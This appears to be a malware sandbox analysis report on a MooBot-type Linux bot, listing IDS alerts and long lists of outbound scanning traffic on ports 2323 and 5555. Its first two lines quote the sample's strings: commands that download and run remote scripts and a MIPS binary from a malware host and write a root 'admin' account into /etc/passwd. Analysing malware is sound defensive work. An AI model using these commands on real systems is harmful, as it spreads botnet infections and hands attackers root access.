    Source: rcD.73.drString: -e (sleep 10 cd /tmp; cd /var/tmp; && wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh; /bin/tftp -g -r mips fucking.blackpeople.lol; chmod +x mips; ./mips && echo -e admin:$1$$9mYsNML1XQS/4TUGI/lNe0:0:0:root:/:/bin/sh > /etc/passwd) &
    Source: profile.45.drString: -e (sleep 10 && cd /tmp; cd /var/tmp; /bin/wget http://fucking.blackpeople.lol/bins.sh -O bins.sh; /bin/curl http://fucking.blackpeople.lol/curlBins.sh -O curlBins.sh; sh bins.sh; sh curlBins.sh) & sleep 2147483647

    Networking

    barindex
    Source: TrafficSnort IDS: 2840657 ETPRO TROJAN ELF/MooBot Variant CnC Checkin 192.168.2.23:40572 -> 45.60.47.253:5555
    Source: TrafficSnort IDS: 2840657 ETPRO TROJAN ELF/MooBot Variant CnC Checkin 192.168.2.23:45300 -> 178.143.16.234:5555
    Source: TrafficSnort IDS: 2840657 ETPRO TROJAN ELF/MooBot Variant CnC Checkin 192.168.2.23:60934 -> 34.120.12.71:5555
    Source: TrafficSnort IDS: 2840657 ETPRO TROJAN ELF/MooBot Variant CnC Checkin 192.168.2.23:48712 -> 18.180.250.234:5555
    Source: TrafficSnort IDS: 2840657 ETPRO TROJAN ELF/MooBot Variant CnC Checkin 192.168.2.23:52334 -> 188.149.193.65:5555
    Source: TrafficSnort IDS: 2840657 ETPRO TROJAN ELF/MooBot Variant CnC Checkin 192.168.2.23:53038 -> 2.51.74.178:5555
    Source: TrafficSnort IDS: 2840657 ETPRO TROJAN ELF/MooBot Variant CnC Checkin 192.168.2.23:42948 -> 104.232.104.118:5555
    Source: TrafficSnort IDS: 2840657 ETPRO TROJAN ELF/MooBot Variant CnC Checkin 192.168.2.23:39356 -> 35.190.42.94:5555
    Source: TrafficSnort IDS: 2840657 ETPRO TROJAN ELF/MooBot Variant CnC Checkin 192.168.2.23:53186 -> 5.252.77.62:5555
    Source: TrafficSnort IDS: 2840657 ETPRO TROJAN ELF/MooBot Variant CnC Checkin 192.168.2.23:56642 -> 156.246.98.44:5555
    Source: TrafficSnort IDS: 2840657 ETPRO TROJAN ELF/MooBot Variant CnC Checkin 192.168.2.23:47268 -> 109.33.22.17:5555
    Source: TrafficSnort IDS: 2840657 ETPRO TROJAN ELF/MooBot Variant CnC Checkin 192.168.2.23:49508 -> 107.154.156.97:5555
    Source: TrafficSnort IDS: 2840657 ETPRO TROJAN ELF/MooBot Variant CnC Checkin 192.168.2.23:40950 -> 78.71.5.178:5555
    Source: TrafficSnort IDS: 2840657 ETPRO TROJAN ELF/MooBot Variant CnC Checkin 192.168.2.23:47764 -> 34.36.224.71:5555
    Source: TrafficSnort IDS: 2840657 ETPRO TROJAN ELF/MooBot Variant CnC Checkin 192.168.2.23:38506 -> 202.243.135.193:5555
    Source: TrafficSnort IDS: 2840657 ETPRO TROJAN ELF/MooBot Variant CnC Checkin 192.168.2.23:43694 -> 107.154.140.253:5555
    Source: TrafficSnort IDS: 2840657 ETPRO TROJAN ELF/MooBot Variant CnC Checkin 192.168.2.23:39704 -> 34.95.78.67:5555
    Source: TrafficSnort IDS: 2840657 ETPRO TROJAN ELF/MooBot Variant CnC Checkin 192.168.2.23:55896 -> 72.3.15.174:5555
    Source: unknownNetwork traffic detected: HTTP traffic on port 5555 -> 40572
    Source: unknownNetwork traffic detected: HTTP traffic on port 5555 -> 53186
    Source: unknownNetwork traffic detected: HTTP traffic on port 5555 -> 56642
    Source: unknownNetwork traffic detected: HTTP traffic on port 5555 -> 49508
    Source: unknownNetwork traffic detected: HTTP traffic on port 5555 -> 40950
    Source: unknownNetwork traffic detected: HTTP traffic on port 5555 -> 43694
    Source: /bin/sh (PID: 6349)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --destination-port 23 -j DROPJump to behavior
    Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
    Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
    Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 194.230.207.139:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 126.179.65.54:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 92.182.95.71:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 87.117.78.171:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 72.14.93.16:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 219.54.168.53:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 183.32.173.129:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 94.157.174.240:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 96.65.213.182:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 93.131.211.242:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 182.159.81.146:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 99.210.43.114:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 152.174.177.127:2323
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 219.132.156.139:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 14.30.220.164:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 182.169.238.213:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 195.51.41.21:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 174.128.194.211:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 203.186.142.20:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 114.96.175.210:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 209.89.175.15:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 18.72.251.1:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 161.186.209.173:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 136.89.27.46:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 203.31.127.42:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 1.124.155.35:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 94.88.244.201:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 245.186.191.202:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 82.187.212.38:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 193.216.243.173:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 116.218.185.32:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 91.155.253.99:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 44.185.185.227:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 19.139.53.220:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 129.2.39.43:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 45.255.250.7:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 185.70.92.243:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 85.29.182.225:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 66.76.67.122:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 187.124.180.224:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 86.42.72.54:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 46.102.147.15:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 200.26.4.226:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 47.229.59.162:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 32.180.167.190:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 159.95.255.246:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 147.95.86.191:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 109.252.166.58:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 133.13.103.102:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 135.217.236.175:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 58.245.54.243:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 88.152.68.45:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 135.7.239.35:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 164.199.149.212:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 198.44.183.163:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 178.179.181.58:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 222.173.188.38:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 89.117.188.206:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 158.150.97.138:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 250.172.180.229:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 158.127.223.170:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 174.200.120.65:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 104.223.131.90:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 196.162.80.156:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 149.134.150.88:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 24.58.240.168:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 66.109.127.215:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 253.112.208.235:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 181.240.136.79:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 27.252.151.140:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 209.255.135.122:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 198.119.14.147:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 57.16.235.154:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 196.96.49.46:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 177.205.213.73:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 41.66.83.240:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 112.252.78.234:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 76.13.203.75:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 253.179.63.215:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 74.166.95.69:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 13.139.163.245:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 204.104.154.118:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 75.208.95.129:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 247.245.182.141:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 167.50.183.46:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 246.147.137.230:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 194.36.26.139:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 190.193.165.181:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 121.194.244.222:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 177.80.112.180:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 199.83.178.149:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 75.204.205.179:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 47.246.210.70:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 130.13.53.238:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 254.5.141.105:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 252.202.134.10:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 168.136.1.182:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 218.202.10.81:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 185.202.103.64:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 122.19.94.191:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 245.46.203.136:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 243.152.53.184:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 83.225.139.110:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 43.208.188.225:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 181.193.28.27:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 82.109.187.56:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 72.58.86.142:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 24.190.44.92:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 178.221.235.194:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 202.103.113.176:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 78.151.77.68:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 95.243.129.186:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 39.182.183.24:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 99.54.5.243:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 27.141.56.51:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 114.244.151.246:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 173.17.31.184:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 111.58.67.135:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 176.27.74.126:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 61.237.21.212:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 213.148.112.3:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 153.51.255.60:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 159.88.142.210:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 182.170.161.146:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 188.225.59.218:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 190.112.34.99:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 190.158.40.8:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 142.170.150.200:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 209.52.167.255:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 204.139.147.59:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 54.12.201.1:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 217.186.16.250:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 53.110.236.190:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 200.11.245.77:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 8.127.154.255:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 67.246.0.187:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 148.159.208.100:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 185.12.190.58:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 43.185.231.168:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 82.64.68.102:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 46.79.219.224:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 129.10.188.213:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 211.205.89.164:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 121.99.56.90:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 18.128.35.155:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 2.113.31.65:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 76.253.38.192:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 193.100.79.141:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 164.190.146.43:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 223.155.238.254:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 199.106.107.43:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 110.29.119.132:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 244.101.164.87:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 1.80.237.216:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 59.47.165.45:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 105.207.91.94:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 244.130.81.143:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 116.206.248.98:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 158.169.203.143:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 159.218.225.167:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 159.135.246.10:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 142.212.190.38:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 208.197.220.52:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 205.158.89.127:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 82.232.35.230:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 90.95.231.217:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 71.15.41.250:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 1.80.97.195:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 63.1.154.238:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 8.237.226.64:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 142.171.188.204:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 221.51.108.153:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 145.244.197.249:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 243.7.64.247:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 245.135.208.73:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 240.112.39.128:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 149.88.125.41:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 90.64.194.48:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 44.60.112.235:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 159.63.163.250:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 202.199.9.155:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 254.244.80.31:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 116.187.97.24:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 53.58.133.171:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 142.123.139.216:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 46.97.69.136:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 136.107.100.189:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 218.152.75.192:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 160.91.155.220:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 87.63.39.5:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 154.104.240.171:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 146.191.70.185:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 108.216.66.191:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 1.236.98.114:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 43.116.4.192:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 124.194.28.245:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 130.207.245.13:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 103.197.189.218:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 57.114.146.114:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 9.218.112.131:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 216.85.95.85:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 70.210.59.11:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 92.187.153.127:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 96.211.88.102:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 9.111.219.92:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 108.178.126.107:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 198.16.105.38:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 67.176.252.158:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 92.165.251.61:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 62.83.191.90:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 37.99.114.58:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 116.37.216.195:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 16.91.17.30:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 147.33.112.217:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 35.147.33.219:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 140.219.205.46:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 135.72.180.80:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 9.146.17.254:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 161.108.115.212:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 113.184.123.50:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 194.112.24.218:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 201.166.161.224:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 123.219.193.149:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 181.154.31.17:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 247.240.121.198:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 197.232.187.50:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 24.83.212.21:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 244.32.25.161:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 77.142.21.43:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 201.54.253.242:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 217.196.99.155:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 126.157.143.113:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 87.61.24.39:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 216.220.158.30:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 198.73.97.195:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 250.105.50.180:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 80.134.181.208:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 116.138.52.187:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 245.45.133.64:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 81.115.144.177:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 211.8.156.204:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 251.233.253.17:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 163.1.110.190:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 91.172.88.209:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 101.27.5.79:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 69.51.199.234:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 112.47.92.22:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 200.67.145.216:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 46.239.47.121:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 14.103.229.10:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 193.33.127.82:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 37.89.49.199:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 19.188.77.171:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 155.95.238.210:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 142.78.154.210:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 23.118.246.85:5555
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 161.176.112.228:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 115.208.161.244:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 13.6.107.64:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 175.228.13.124:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 210.219.232.14:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 191.175.78.212:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 218.39.16.125:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 217.184.170.129:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 102.252.204.205:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 165.116.21.247:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 175.8.74.249:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 5.47.150.25:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 76.205.174.55:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 94.147.152.204:2323
    Source: global trafficTCP traffic: 192.168.2.23:62562 -> 190.252.77.5:2323
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 76.169.3.124:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 20.209.107.92:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 120.59.38.232:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 70.118.82.144:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 156.248.220.79:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 101.246.116.22:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 114.247.116.105:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 174.169.96.122:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 40.145.220.23:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 252.152.148.185:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 201.231.15.184:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 70.1.23.100:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 195.176.219.123:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 4.153.129.224:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 69.48.42.69:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 201.12.124.222:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 253.68.132.154:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 126.89.144.72:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 2.41.230.79:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 123.69.149.248:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 76.74.42.173:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 117.173.102.40:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 174.156.239.87:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 202.252.245.232:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 68.181.139.117:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 148.12.45.188:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 23.81.226.162:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 147.128.18.221:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 14.60.175.97:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 206.188.86.90:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 8.220.194.160:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 31.47.131.0:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 98.83.38.208:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 103.176.114.29:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 47.81.86.180:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 60.91.212.212:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 75.104.12.199:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 167.107.77.207:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 86.123.158.131:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 4.47.216.160:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 61.222.193.248:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 149.182.153.227:5555
    Source: global trafficTCP traffic: 192.168.2.23:45602 -> 76.37.243.27:5555
